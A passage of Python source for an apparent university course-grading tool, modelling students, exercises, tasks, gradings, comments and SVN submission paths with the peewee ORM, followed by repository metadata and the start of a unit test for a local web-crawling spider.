v)}, \\\n {k: v for k, v in d.items() if not predicade(k, v)}\n\n def __set__(self, obj, value):\n raise NotImplementedError\n # self.obj = value\n\n\nclass Searchable:\n fields = defaultdict(list)\n\n @classmethod\n def register(cls, f, *args, **kwargs):\n field = f(*args, **kwargs)\n temp_add = field.add_to_class\n\n def add_to_class(model_class, name):\n cls.fields[model_class].append(field)\n temp_add(model_class, name)\n\n field.add_to_class = add_to_class\n return field\n\n @classmethod\n def CharField(cls, *args, **kwargs):\n return cls.register(CharField, *args, **kwargs)\n\n @classmethod\n def IntegerField(cls, *args, **kwargs):\n return cls.register(IntegerField, *args, **kwargs)\n\n @classmethod\n def PrimaryKeyField(cls, *args, **kwargs):\n return cls.register(PrimaryKeyField, *args, **kwargs)\n\n @classmethod\n def query(cls, model_classes, value, op=OP.IN):\n def coercable(f, v):\n try:\n f.coerce(v)\n return True\n except:\n return False\n\n nodes = [Expression(f, op, value) for m in model_classes\n for f in cls.fields[m] if coercable(f, value)]\n\n return reduce(lambda f, old: (f) | (old), nodes, True)\n\n\nclass BaseModel(Model):\n @property\n def format_vars(self):\n\n rv = FormatDict()\n field_names = self._meta.get_field_names()\n class_keys = [k for k, v in self.__class__.__dict__.items() if\n isinstance(v, property)]\n rv.add_data(field_names, self)\n rv.add_data(class_keys, self)\n return rv\n\n @property\n def field_values(self):\n return {f: getattr(self, f) for f in self._meta.get_field_names()}\n\n @classmethod\n def const_records(cls):\n return {n: getattr(cls, n) for n, a in cls.__dict__.items() if\n isinstance(a, Record)}\n\n def get_pk_names(self):\n for pk in self._meta.get_primary_key_fields():\n yield pk.name\n\n def clone(self):\n d = {k: v for k, v in self.field_values.items() if\n k not in self.get_pk_names()}\n return type(self)(**d)\n\n @classproperty\n def searchable(cls):\n return [cls]\n\n @classmethod\n def search_completer(cls, models=None):\n if models is None:\n models = cls.searchable\n\n def completer(cls, text, state):\n rm = cls._meta.related_models(True)\n # return []\n\n return completer\n\n @classmethod\n def related_paths(cls, limit=None, backrefs=True):\n model_paths = defaultdict(list)\n stack = [(cls, None)]\n while stack:\n model, parent = stack.pop(0)\n if model_paths[model]:\n continue\n if parent:\n model_paths[model] += model_paths[parent]\n model_paths[model].append(model)\n\n for fk in model._meta.rel.values():\n stack.append((fk.rel_model, model))\n if backrefs:\n for fk in model._meta.reverse_rel.values():\n stack.append((fk.model_class, model))\n if not limit:\n return dict(model_paths)\n return {k: v for k, v in model_paths.items() if len(v) <= limit}\n\n class Meta:\n database = db\n\n\nclass FileCommand(BaseModel):\n command = CharField()\n shell = BooleanField(default=False)\n\n OPEN = Record(id=1,\n command='open -nW' if OS.OSX.is_running else 'gnome-open')\n ANDROID_STUDIO = Record(id=3,\n command='open -n /Applications/Android\\ Studio.'\n 'app/ --args' if OS.OSX.is_running else 'android-studio',\n shell=True)\n DIFF = Record(id=4,\n command='open -W /Applications/DiffMerge.app/ --args'\n '' if OS.OSX.is_running else 'meld')\n\n SHELL_ALL_DEVNULL = dict(\n shell=True,\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL\n )\n\n DEFAULT_POPEN_ARGS = dict(\n preexec_fn=setpgrp,\n # lambda: signal.signal(signal.SIGINT,signal.SIG_IGN)\n )\n\n def open(self, *args, **kwargs):\n cmd = [s.replace('\\ ', ' ') for s in\n re.split(r'(?<!\\\\) ', self.command)] + list(args)\n print(str(cmd))\n ukwargs = self.DEFAULT_POPEN_ARGS.copy()\n if self.shell:\n ukwargs.update(self.SHELL_ALL_DEVNULL)\n ukwargs.update(kwargs)\n return Popen(cmd, **ukwargs)\n\n class Meta:\n database = os_db\n\n\n# safely create FileCommand table, its const records are referenced in FileType\nos_db.create_tables([FileCommand], safe=True)\n\n\nclass FileType(BaseModel):\n type = CharField()\n mime = CharField(null=True, default=None)\n command = ForeignKeyField(FileCommand, null=True, default=None)\n\n DIR = Record(id=1, type=\"Directory\")\n PDF = Record(id=2, type=\"PDF\", command=FileCommand.OPEN)\n TXT = Record(id=3, type=\"TXT\", command=FileCommand.OPEN)\n XML = Record(id=4, type=\"XML\", command=FileCommand.OPEN)\n ASP = Record(id=5, type=\"AS Project\", command=FileCommand.ANDROID_STUDIO)\n\n OTH = Record(id=10, type=\"unknown file\")\n\n @property\n def readable(self):\n return self.command is not None\n\n def open(self, *args, **kwargs):\n return self.command.open(*args, **kwargs)\n\n\n# safely create FileType table, its const records are referenced in Directory\nos_db.create_tables([FileType], safe=True)\n\n\nclass Hierarchy:\n class Method:\n def __init__(self, f, instance=None, typ=None):\n self.function = f\n self.instance = instance\n self.type = typ\n\n def __get__(self, obj, type=None):\n return self.__class__(self.function, obj, type)\n\n @property\n def method(self):\n return self.get_method(self.instance)\n\n def get_method(self, instance, typ=None):\n if typ is None:\n typ = self.type\n assert isinstance(instance, Hierarchy), TypeError(\n '{} is no {}'.format(instance, Hierarchy.__name__))\n return self.function.__get__(instance, typ)\n\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n class AncestorMethod(Method):\n def __call__(self, *args, **kwargs):\n m, p = self.method, self.instance.parent\n if p: yield from getattr(p, m.__name__,\n self.get_method(p))(*args, **kwargs)\n yield m(*args, **kwargs)\n\n class DescendantMethod(Method):\n def __call__(self, *args, **kwargs):\n m = self.method\n yield m(*args, **kwargs)\n for c in self.instance.children:\n yield from getattr(c, m.__name__,\n self.get_method(c))(*args, **kwargs)\n\n @property\n def children(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def parent(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def descendants(self):\n return self.get_descendants()\n\n @DescendantMethod\n def get_descendants(self):\n return self\n\n @staticmethod\n def get(*args):\n for h in args:\n yield from h.descendants\n\n @property\n def ancestors(self):\n return self.get_ancestors()\n\n @AncestorMethod\n def get_ancestors(self):\n return self\n\n def __gt__(self, other):\n return other in self.ancestors\n\n def __lt__(self, other):\n return self in other.ancestors\n\n\nclass DirectoryBase(Hierarchy):\n @property\n def absolute(self):\n raise NotImplementedError('must be overridden.')\n\n def open(self):\n return self.file_type.open(self.absolute)\n\n def open_if_exists(self):\n if self.exists:\n return self.open()\n\n def create_if_not_exists(self):\n if not self.exists:\n f = open(self.absolute, 'x')\n f.close()\n return True\n return False\n\n @property\n def path(self):\n raise NotImplementedError('must be overridden.')\n\n def relpath(self, other):\n return path.relpath(self.absolute, other.absolute)\n\n @property\n def repository_dir(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def relative_to_repo(self):\n # assert self > self.repository_dir, '{} is no subdir of {}!'.format(\n # self, self.repository_dir)\n return self.relpath(self.repository_dir)\n\n def read_file(self):\n if hasattr(self, '_read_file_data'):\n print('file {} was already read.'.format(self.path))\n return self._read_file_data\n\n assert self.exists and self.file_type and self.file_type.readable\n if self.file_type == FileType.XML:\n self._read_file_data = parse(self.absolute)\n else:\n f = open(self.absolute)\n self._read_file_data = f.read()\n f.close()\n\n return self._read_file_data\n\n def save_file(self, data=None):\n if data is None:\n assert hasattr(self, '_read_file_data')\n data = self._read_file_data\n if self.file_type == FileType.XML:\n assert isinstance(data, Document)\n data = data.toxml()\n\n f = open(self.absolute, 'w')\n f.write(data)\n f.close()\n\n @property\n def type(self):\n # TODO: remove this\n return self.Type(self.Type.testDir(self.absolute))\n\n @property\n def file_type(self):\n raise NotImplementedError('must be overridden.')\n\n @property\n def exists(self):\n if self.parent:\n return self.parent.exists and self.type.exists(self.path,\n self.parent.absolute)\n else:\n return path.exists(self.absolute)\n\n def __str__(self):\n return '<{}: {}>'.format(type(self), self.absolute)\n\n class Type(Enum):\n File = 0\n Directory = 1\n\n @property\n def test(self):\n return path.isdir if self.value else path.isfile\n\n @classmethod\n def exists(cls, pth, root):\n for p in cls.split(pth):\n if p not in listdir(root) + ['.', '..']:\n return False\n root = path.join(root, p)\n return True\n\n @classmethod\n def split(cls, pth):\n r = path.normpath(pth).split(path.sep)\n return r if r[0] or not r else r[1:]\n # a, b = path.split(pth)\n # return (cls.split(a) if len(a) and len(b) else []) + [b]\n\n @staticmethod\n def testDir(pth):\n return (path.altsep and pth.endswith(path.altsep)) or pth.endswith(\n path.sep)\n\n\nclass Student(BaseModel):\n first_name = Searchable.CharField()\n last_name = Searchable.CharField()\n mail = CharField(unique=True)\n rep = IntegerField()\n ects = IntegerField()\n user = Searchable.CharField(unique=True)\n\n @property\n def name(self):\n return self.first_name + \" \" + self.last_name\n\n def __str__(self):\n return self.name\n\n @property\n def generated_user(self):\n return self.last_name.lower()[:7] + self.first_name.lower()[0]\n\n\nclass Category(BaseModel):\n name = Searchable.CharField()\n\n FutureHints = Record(id=1, name='Hints for future submissions')\n ProjectStructure = Record(id=2, name='Project Structure')\n Warning = Record(id=3, name='Warning')\n Other = Record(id=4, name='Other')\n\n def __str__(self):\n return \"{}: {}\".format(type(self).__name__, self.name)\n\n\nclass Exercise(BaseModel):\n nr = Searchable.PrimaryKeyField()\n published = DateField(formats=['%Y-%m-%d', '%d.%m.%Y'])\n due = DateTimeField(formats=['%Y-%m-%d %H:%M:%S', '%d.%m.%Y %H:%M:%S'])\n\n @property\n def Name(self):\n return \"Exercise Sheet {}\".format(self.nr)\n\n def __str__(self):\n return self.Name\n\n @property\n def max_points(self):\n return sum(c.max_points for c in self.tasks)\n\n @property\n def root_tasks(self):\n return Task.select().where(Task.parent.is_null(), Task.ex == self)\n\n def existing_comments(self, s: Student):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.student == s)\n\n def existint_others(self, s: Student):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.comment.not_in(self.existing_comments(s)))\n\n @property\n def all_comments(self):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self,\n ExerciseComment.cat != Category.ProjectStructure) | \\\n Comment.select().join(\n GradingComment).join(Grading).join(Task).where(\n (Grading.ex == self) | (Task.ex == self))\n\n @property\n def completed(self):\n return all(GradingStatus(self, s).completed for s in Student)\n\n\nclass Task(BaseModel, Hierarchy):\n name = Searchable.CharField()\n parent = ForeignKeyField('self', related_name='children', null=True)\n ex = ForeignKeyField(Exercise, related_name='tasks', null=True)\n max_points = FloatField(default=0)\n always_processed = BooleanField(default=False)\n hidden_question = BooleanField(default=False)\n\n Report = Record(name='Report', max_points=2, ex=None)\n Comments = Record(name='Comments', max_points=2, ex=None)\n CodeQuality = Record(name='Code Quality', max_points=2, ex=None,\n always_processed=True)\n Usability = Record(name='Usability', max_points=2, ex=None,\n always_processed=True)\n\n @classmethod\n def general_tasks(cls):\n return cls.select().where(cls.ex.is_null())\n\n @classmethod\n def general_root_tasks(cls):\n return cls.select().where(cls.ex.is_null(), cls.parent.is_null())\n\n @classmethod\n def specific_tasks(cls):\n return cls.select().where(cls.ex.is_null(False))\n\n @property\n def is_general(self):\n return self.ex is None\n\n @property\n def depth(self):\n return self.parent.depth + 1 if self.parent else 0\n\n @property\n def visible_depth(self):\n return self.parent.visible_depth + int(\n not self.hidden_question) if self.parent else 0\n\n @property\n def total_max_points(self):\n return self.max_points + sum(c.total_max_points for c in self.children)\n\n def get_grading(self, s: Student, ex: Exercise = None):\n queries = [Grading.student == s, Grading.task == self]\n if self.ex is None:\n queries.append(Grading.ex == ex)\n elif self.ex != ex:\n raise DoesNotExist('requested exercise number {} does not '\n 'match task\\'s ({})'.format(self.ex, ex))\n try:\n return Grading.get(*queries)\n except DoesNotExist:\n g = Grading()\n g.student = s\n g.task = self\n if not self.ex:\n g.ex = ex\n return g\n\n @classproperty\n def searchable(cls):\n return [cls, Exercise]\n\n def __str__(self):\n return \"Task \" + \" > \".join(t.name for t in self.ancestors)\n\n class Meta:\n indexes = (\n (('name', 'ex'), True),\n )\n\n\nclass GradingStatus:\n def __init__(self, ex: Exercise, s: Student):\n self.ex = ex\n self.stud = s\n\n @property\n def tasks(self):\n for t in self.root_tasks:\n yield from t.descendants\n\n @property\n def root_tasks(self):\n yield from Task.general_root_tasks()\n yield from self.ex.root_tasks\n\n @property\n def general_gradings(self):\n return self.get_desc_gradings(*Task.general_root_tasks())\n\n @property\n def specific_gradings(self):\n return self.get_desc_gradings(*self.ex.root_tasks)\n\n @property\n def gradings(self):\n yield from self.general_gradings\n yield from self.specific_gradings\n\n def get_gradings(self, *tasks):\n for t in tasks:\n try:\n yield t.get_grading(self.stud, self.ex)\n except DoesNotExist:\n pass\n\n def get_desc_gradings(self, *tasks):\n yield from self.get_gradings(*Hierarchy.get(*tasks))\n\n def make_failed(self, *tasks):\n return all(g.make_failed() for g in self.get_gradings(*tasks))\n\n @property\n def total_points(self):\n return sum(g.total_points for g in self.get_gradings(*self.root_tasks)) \\\n + sum(c.add_in_total_ex_points for c in self.gradings) \\\n + sum(c.point_modifier for c in self.ex_comments)\n\n @property\n def progress(self):\n return self.Partition((g, g.status) for g in self.gradings)\n\n @property\n def completed(self):\n return all(g.completed for g in self.gradings)\n\n @property\n def started(self):\n return any(g.status for g in self.gradings)\n\n def __str__(self):\n return \"{}\\n{}\".format('completed' if self.completed else 'incomplete',\n self.progress)\n\n @property\n def status(self):\n return self.Values(self.started + self.completed)\n\n @property\n def ex_comments(self):\n return Comment.select().join(ExerciseComment).where(\n ExerciseComment.ex == self.ex,\n ExerciseComment.student == self.stud)\n\n @property\n def gr_comments(self):\n return Comment.select().join(GradingComment).join(Grading).join(\n Task).where((Grading.ex == self.ex) | (Task.ex == self.ex))\n\n\n @property\n def all_comments(self):\n return self.gr_comments | self.ex_comments\n\n class Partition:\n def __init__(self, items):\n self.d = {}\n for t, s in items:\n self.d.setdefault(s, [])\n self.d[s].append(t)\n\n @property\n def all_items(self):\n return [i for v in self.d.values() for i in v]\n\n def __len__(self):\n return len(self.all_items)\n\n def items(self, key):\n return self.d.get(key)\n\n def absolute(self, key):\n return len(self.items(key))\n\n def relative(self, key):\n return self.absolute(key) / len(self)\n\n def __str__(self):\n return \"\\n\".join(\n '{k}: {abs}/{tot} ({rel:.1%})'.format(k=k.name,\n abs=self.absolute(k),\n tot=len(self),\n rel=self.relative(k))\n for k in self.d)\n\n class Values(AddEnum):\n OPEN = 0\n STARTED = 1\n COMPLETED = 2\n\n def __bool__(self):\n return bool(self.value)\n\n\nclass Comment(BaseModel):\n # id = PrimaryKeyField()\n # task = ForeignKeyField(Task, related_name='comments', null=True)\n message = Searchable.CharField()\n point_modifier = FloatField(default=0)\n visible = BooleanField(default=True)\n\n ProjectPathMissing = Record(id=1,\n message=\"There was nothing committed.\",\n point_modifier=0)\n IdeaProjectFolderMissing = Record(id=2,\n message=\"The {name} is missing! Please commit the whole AS project.\",\n point_modifier=0)\n CommittedIgnoredItems = Record(id=3,\n message=\"There were items committed that \"\n \"should be ignored.\",\n point_modifier=-0.5)\n MissingItems = Record(id=4,\n message=\"There were important items missing.\",\n point_modifier=-2)\n MissingManifest = Record(id=5, message=\"The Android Manifest is missing.\",\n point_modifier=-2)\n ReportReminder = Record(id=6, message=\"Don't forget the report next time!\",\n point_modifier=0)\n # ReportMissing = Record(id=7, message=\"You have not committed a Report.\",\n # point_modifier=-2)\n reserved7 = Record(id=7, message=\"reserved comment 7\", point_modifier=0)\n ForgiveCommittedIgnoredItems = Record(id=8,\n message=\"For this exercise it is ok \"\n \"to have submitted ignored files.\",\n point_modifier=0.5)\n reserved9 = Record(id=9, message=\"reserved comment 9\", point_modifier=0)\n\n # The report is not mandatory for the first exercise but keep it in mind for the other exercises.\n\n def __str__(self):\n visible_str = '' if self.visible else '[invisible] '\n return '{}{} {}'.format(visible_str, self.message, self.point_str)\n\n @property\n def point_str(self):\n return '({})'.format(\n self.point_modifier) if self.point_modifier else ''\n\n def format(self, *args, **kwargs):\n self.message = self.message.format(*args, **kwargs)\n return self\n\n @property\n def categories(self):\n return Category.select().distinct().join(ExerciseComment).where(\n ExerciseComment.id << self.ex_coms)\n\n @property\n def tasks(self):\n return Task.select().distinct().join(Grading).join(\n GradingComment).where(\n GradingComment.id << self.gradings)\n\n @property\n def used(self):\n return self.ex_coms.count() + self.gradings.count()\n\n def get_contexts(self, ex: Exercise, s: Student):\n r = []\n for t in self.tasks:\n try:\n r.append(t.get_grading(s, ex))\n except DoesNotExist:\n pass\n return r + list(self.categories)\n\n def add_context(self, context, s, ex):\n if isinstance(context, Task):\n g = context.get_grading(s, ex)\n assert g.status, DoesNotExist('Grading missing.')\n return GradingComment.get_or_create(\n grading=g,\n comment=self)\n elif isinstance(context, Category):\n return ExerciseComment.get_or_create(student=s, ex=ex,\n cat=context,\n comment=self)\n else:\n raise TypeError('invalid context: {}'.format(context))\n\n def move_to(self, context):\n queries = {q.model_class: list(q) for q in\n (GradingComment.select().where(\n GradingComment.comment == self),\n ExerciseComment.select().where(\n ExerciseComment.comment == self))}\n\n moved = {\n GradingComment: 0,\n ExerciseComment: 0\n }\n\n for c, l in queries.items():\n for rel in list(l):\n s, ex = rel.student, rel.ex\n added, nrel = self.add_context(context, s, ex)\n if added:\n rel.delete_instance()\n moved[c] += 1\n\n return {k.__name__:\n {'moved': v, 'untouched': len(list(queries[k])) - v}\n for k, v in moved.items()}\n\n def used_for(self, s: Student, ex: Exercise):\n q1where = (ExerciseComment.student == s, ExerciseComment.ex == ex)\n q1 = self.categories.where(*q1where)\n\n q2where = (Grading.student == s, (Task.ex == ex) | (Grading.ex == ex))\n q2 = self.tasks.where(*q2where)\n r_lst = list(q1) + list(q2)\n\n return len(r_lst)\n\n def used_in_Exercises(self, s: Student = None):\n q1where = [ExerciseComment.id << self.ex_coms]\n q2where = [GradingComment.id << self.gradings]\n\n if s is not None:\n q1where.append(ExerciseComment.student == s)\n q2where.append(Grading.student == s)\n\n q1 = Exercise.select().join(ExerciseComment).where(*q1where)\n q2 = Grading.select().join(GradingComment).where(*q2where)\n\n r = []\n for e in list(q1) + [g.true_ex for g in q2]:\n if e not in r:\n r.append(e)\n\n return r\n\n @classmethod\n def get_unused(cls):\n return [c for c in cls if not c.used]\n\n @classmethod\n def get_unused_noconst(cls):\n return [c for c in cls if\n not (c.used or c.id in [cn.id for cn in\n cls.const_records().values()])]\n\n @classproperty\n def searchable(cls):\n return [cls, Task, Category]\n\n class Created(AddEnum):\n Existed = 0\n Added = 1\n New = 2\n\n def __str__(self):\n return [\n 'The comment existed and had already been added.',\n 'The comment existed, but now was added.',\n 'The comment was created and added.',\n ][self.value]\n\n\nclass Grading(BaseModel, Hierarchy):\n student = ForeignKeyField(Student)\n task = ForeignKeyField(Task, related_name='gradings')\n ex = ForeignKeyField(Exercise, null=True)\n processed = BooleanField(\n help_text='Has the student has worked on the task at all?')\n completed = BooleanField(default=False)\n point_modifier = FloatField(default=0)\n\n def existing_comments(self):\n return Comment.select().join(GradingComment).where(\n GradingComment.grading != self).join(Grading).where(\n Grading.task == self.task)\n\n @property\n def true_ex(self):\n return self.ex or self.task.ex\n\n def __str__(self):\n return \"{}: {} {}\".format(self.task.name, self.print_processed,\n self.print_points)\n\n @property\n def visible(self):\n return not self.task.hidden_question\n # (not self.task.hidden_question) or self.lost_points\n\n @Hierarchy.DescendantMethod\n def make_failed(self):\n self.processed = False\n self.completed = True\n return self.save()\n\n @Hierarchy.AncestorMethod\n def uncomplete(self):\n self.completed = False\n return self.save()\n\n @Hierarchy.AncestorMethod\n def make_processed(self):\n self.processed = True\n return self.save()\n\n def complete(self):\n self.completed = True\n return self.save() and all(g.complete() for g in self.children)\n\n @property\n def print_processed(self):\n if self.task.always_processed:\n return \"\"\n return \"Ok.\" if self.processed else \"Missing.\"\n\n @property\n def zero_points(self):\n return not (self.processed or self.task.always_processed)\n\n @property\n def add_in_total_ex_points(self):\n return (- self.task.max_points) if self.task.is_general else 0\n\n @property\n def points(self):\n if self.zero_points:\n return 0\n else:\n return self._point_modifiers + self.task.max_points\n\n @property\n def _point_modifiers(self):\n return self.point_modifier + sum(\n gc.comment.point_modifier for gc in self.comments)\n\n @property\n def children(self):\n for st in self.task.children:\n try:\n yield st.get_grading(self.student, self.task.ex)\n except DoesNotExist:\n pass\n\n @property\n def parent(self):\n if self.task.parent:\n return self.task.parent.get_grading(self.student, self.task.ex)\n\n @property\n def total_points(self):\n result = 0\n if not self.zero_points:\n result += self.points + sum(c.total_points for c in self.children)\n # sum(c.total_points for c in self.children)\n if result < 0 and self.task.total_max_points:\n print('points for {} were {}, cut off at 0.'.format(self.task,\n result))\n return 0\n return result\n\n @property\n def lost_points(self):\n return self.total_points < self.task.total_max_points\n\n @property\n def print_points(self):\n if self.task.total_max_points:\n s = '({} / {} points)'\n elif self.total_points:\n s = '({} points)'\n else:\n s = ''\n return s.format(self.total_points,\n self.task.total_max_points)\n\n @property\n def status(self):\n return GradingStatus.Values(\n (self.processed is not None) + self.completed)\n\n class Meta:\n indexes = (\n (('student', 'task', 'ex'), True),\n )\n\n\nclass GradingComment(BaseModel):\n grading = ForeignKeyField(Grading, related_name='comments')\n comment = ForeignKeyField(Comment, related_name='gradings')\n\n @property\n def context(self):\n return self.grading\n\n @property\n def student(self):\n return self.grading.student\n\n @property\n def ex(self):\n return self.grading.ex if self.grading.ex is not None \\\n else self.grading.task.ex\n\n\nclass ExerciseComment(BaseModel):\n student = ForeignKeyField(Student)\n ex = ForeignKeyField(Exercise, related_name='used_ex_comments')\n cat = ForeignKeyField(Category)\n comment = ForeignKeyField(Comment, related_name='ex_coms')\n\n @property\n def context(self):\n return self.cat\n\n\nclass ExerciseQuestion(BaseModel):\n ex = ForeignKeyField(Exercise, related_name='ex_questions')\n question = CharField()\n\n\nclass ExtraProjects(BaseModel):\n name = Searchable.CharField()\n ex = ForeignKeyField(Exercise, related_name='projects')\n\n\nclass Directory(BaseModel, DirectoryBase):\n urltest = re.compile(\"^https?://\")\n REP_STRING = \"asp{rep:02d}\"\n\n name = Searchable.CharField(unique=True)\n path = CharField()\n parent = ForeignKeyField('self', related_name='children', null=True,\n to_field='name')\n svn_rep = CharField(null=True)\n file_type = ForeignKeyField(FileType, null=True, default=FileType.DIR)\n\n # self.urltest.match(self.path):\n\n @property\n def absolute(self, *others):\n pathlist = [getcwd()] + [d.path for d in self.ancestors] + list(\n others)\n abs_path = path.abspath(path.join(*pathlist))\n return abs_path\n\n @property\n def relative(self):\n return self.rel_root(self)\n\n @property\n def type(self):\n return self.Type(self.path.endswith('/'))\n\n @property\n def repository_dir(self):\n return next(x for x in self.ancestors if x.svn_rep)\n\n @property\n def repository(self):\n return LocalClient(self.repository_dir.absolute)\n\n @property\n def Name(self):\n return self.name + ' ' + self.type.name.lower()\n\n root = Record(name=\"root\", path=\"..\")\n student = Record(name=\"repository {rep}\",\n path=\"svn/{}/\".format(REP_STRING),\n parent=root, svn_rep=\"https://proglang.informatik.uni-\"\n \"freiburg.de/svn/asp{rep:02d}\")\n internal = Record(name=\"internal repository\",\n path=\"svn/internal/\",\n parent=root, svn_rep=\"https://proglang.informatik.uni-\"\n \"freiburg.de/svn/proglang/teaching/\"\n \"AndroidSmartphoneProgramming/2015\")\n\n exercise_pdf = Record(name=\"exercise sheet\",\n path=\"Material/ex/{Name}.pdf\",\n file_type=FileType.PDF,\n parent=root)\n old_mistakes = Record(name=\"mistakes from former exercises\",\n path=\"old/2014/Mistakes_Ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=internal)\n grading_key = Record(name=\"grading key\",\n path=\"grading/ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=internal)\n\n grading_pre_folder = Record(name=\"preliminary gradings\",\n path=\"gradings/ex{nr}/\",\n parent=internal)\n grading_pre = Record(name=\"preliminary grading\",\n path=\"asp{rep:02d}_{user}.txt\",\n file_type=FileType.TXT,\n parent=grading_pre_folder)\n grading_notes = Record(name=\"grading notes\",\n path=\"Notes.txt\",\n file_type=FileType.TXT,\n parent=grading_pre_folder)\n grading_report = Record(name=\"gradings report\",\n path=\"grading.txt\",\n file_type=FileType.TXT,\n parent=internal)\n grading = Record(name=\"student grading\",\n path=\"grading/ex{nr}.txt\",\n file_type=FileType.TXT,\n parent=student)\n\n ProjectPath = Record(name=\"AS Project\",\n path=\"exercise{nr}/\",\n file_type=FileType.ASP,\n parent=student)\n Report = Record(name='Report',\n path='{user}_report{nr}.pdf',\n file_type=FileType.PDF,\n parent=ProjectPath)\n IdeaProjectFolder = Record(name='.idea Project',\n path='.idea/',\n parent=ProjectPath)\n AppDir = Record(name='App',\n path=\"app/\",\n parent=ProjectPath)\n Manifest = Record(name=\"Manifest\",\n path=\"src/main/AndroidManifest.xml\",\n file_type=FileType.XML,\n parent=AppDir)\n StringsXML = Record(name=\"Strings XML\",\n path=\"src/main/res/values/strings.xml\",\n file_type=FileType.XML,\n parent=AppDir)\n ProjectIml = Record(name='project iml',\n path='{projectname}.iml',\n file_type=FileType.OTH,\n parent=ProjectPath)\n AppIml = Record(name='app iml',\n path='app.iml',\n file_type=FileType.OTH,\n parent=AppDir)\n GradleBuild = Record(name='build.gradle',\n path='build.gradle',\n file_type=FileType.OTH,\n parent=ProjectPath)\n GradleBuildApp = Record(name='(app) build.gradle',\n path='build.gradle',\n file_type=FileType.OTH,\n parent=AppDir)\n GradleSettings = Record(name='gradle settings',\n path='settings.gradle',\n file_type=FileType.OTH,\n parent=ProjectPath)\n PackageFolders = Record(name='Package',\n path='src/androidTest/java/androidlab/{user}/exercise{nr}/',\n parent=AppDir)\n\n def stud_ex_path(self, s, ex, project=None):\n kw = dict(directory=self, student=s, ex=ex)\n if project is None:\n args = (CustomStudenPath.project.is_null(),)\n else:\n args = ()\n assert isinstance(project, ExtraProjects), TypeError\n assert project.ex == ex, IntegrityError\n kw['project'] = project\n try:\n return CustomStudenPath.get(*args, **kw)\n except:\n return CustomStudenPath(*args, **kw)\n\n @classmethod\n def rel_root(cls, pth):\n if isinstance(pth, cls):\n pth = pth.absolute\n return path.relpath(pth, cls.root.absolute)\n\n\nclass CustomStudenPath(BaseModel, DirectoryBase):\n # CURRENT_PROJECT = None\n # DEFAULT_PROJECT = 'exercise{nr}/'\n\n directory = ForeignKeyField(Directory)\n student = ForeignKeyField(Student)\n project = ForeignKeyField(ExtraProjects, null=True, default=None)\n ex = ForeignKeyField(Exercise)\n custom_path = CharField()\n\n @property\n def parent(self):\n r = self.directory.parent\n if isinstance(r, Directory):\n return r.stud_ex_path(self.student, self.ex, self.project)\n\n @property\n def path(self):\n format_vars = self.student.format_vars\n format_vars.add(self.ex.format_vars)\n if self.directory != Directory.ProjectPath:\n pp = Directory.ProjectPath.stud_ex_path(self.student, self.ex,\n self.project).path\n if pp.endswith(path.sep):\n pp = pp[:-1]\n format_vars['projectname'] = path.split(pp)[-1]\n\n return (self.custom_path or self.directory.path).format(**format_vars)\n\n @property\n def Name(self):\n return self.directory.Name\n\n @property\n def file_type(self):\n return self.directory.file_type\n\n def fix_path(self):\n if self.exists and path.isdir(\n self.absolute) and not self.custom_path.endswith(path.sep):\n self.custom_path += path.sep\n return True\n return False\n\n @property\n def repository_dir(self):\n return self.directory.repository_dir.stud_ex_path(self.student,\n self.ex,\n self.project)\n\n @property\n def repository(self):\n return LocalClient(self.repository_dir.absolute)\n\n @property\n def absolute(self):\n pathlist = [getcwd()] + [d.path for d in\n self.ancestors]\n return path.abspath(path.join(*pathlist))\n\n def get_svn_info(self):\n return self.repository.info(self.relative_to_repo)\n\n @property\n def original(self):\n return not self.custom_path # self.is_dirty()\n\n @property\n def status(self):\n v = 0\n try:\n if self.exists:\n v += 1\n if self.get_svn_info():\n v += 1\n if self.original:\n return self.Status.Exists\n except:\n pass\n return self.Status(v)\n\n @property\n def status_string(self):\n return str(self.status).format(self.Name)\n\n @property\n def Name(self):\n return self.directory.name + ' ' + self.type.name.lower()\n\n def append(self, tail):\n self.custom_path = path.join(self.path, tail)\n\n # def __iadd__(self, other):\n\n def __add__(self, other):\n c = self.clone()\n c.append(other)\n return c\n\n class Status(AddEnum):\n DoesNotExist = 0\n ExistsNoSVN = 1\n ExistsChanged = 2\n Exists = 3\n\n @property\n def comment(self):\n return [\n 'The {name} is missing. ({rel_original})',\n 'The {name} is missing (but was added to the repository later - this should not be in a final grading!).',\n 'The {name} is at {rel_custom} instead of the expected location {rel_original}.',\n None,\n ][self.value]\n\n def __str__(self):\n return [\n 'The {} is missing in the filesystem.',\n 'The {} is missing in the repository.',\n 'The {} is present (custom location).',\n 'The {} is present.',\n ][self.value]\n\n @classproperty\n def searchable(cls):\n return [cls, Student, Exercise]\n\n class Meta:\n indexes = (\n (('directory', 'student', 'ex'), False),\n (('directory', 'student', 'ex', 'project'), True),\n )\n\n\ndef model_filter(obj):\n return issubclass(type(obj), type) and \\\n issubclass(obj, BaseModel) and \\\n obj is not BaseModel\n","repo_name":"IARI/asp_grader","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":44043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42781951844","text":"#!/usr/bin/env python\n\"\"\"Unit test for Controller methods\n\nRun a docker nginx server from the samples folder:\n```\ncd tests/samples\ndocker run -p 8000:80 -v $(pwd):/usr/share/nginx/html nginx\n```\n\"\"\"\nimport sys\nimport unittest\n\nimport re\n\nfrom grepspider.spider import Spider\n\nsys.path.append('..')\n\n\nclass TestGrepSpider(unittest.TestCase):\n\n PAGES_ROOT_URL = 'http://localhost:8000/pages'\n\n def setUp(self):\n self.links = None\n self.spider = None\n pass\n\n def _crawl(self, provider, *flags, recursive=False):\n self._crawl_by_spoil(\n provider,\n 'title[^(?: is not a spoil)]',\n *flags,\n recursive=recursive\n )\n\n def _crawl_by_spoil(\n self,\n provider,\n spoil_pattern,\n *flags,\n recursive=False,\n spoil_context=0\n ):\n links = tuple(provider())\n regex_flags = flags\n self.spider = Spider(*links, recursive=recursive)\n 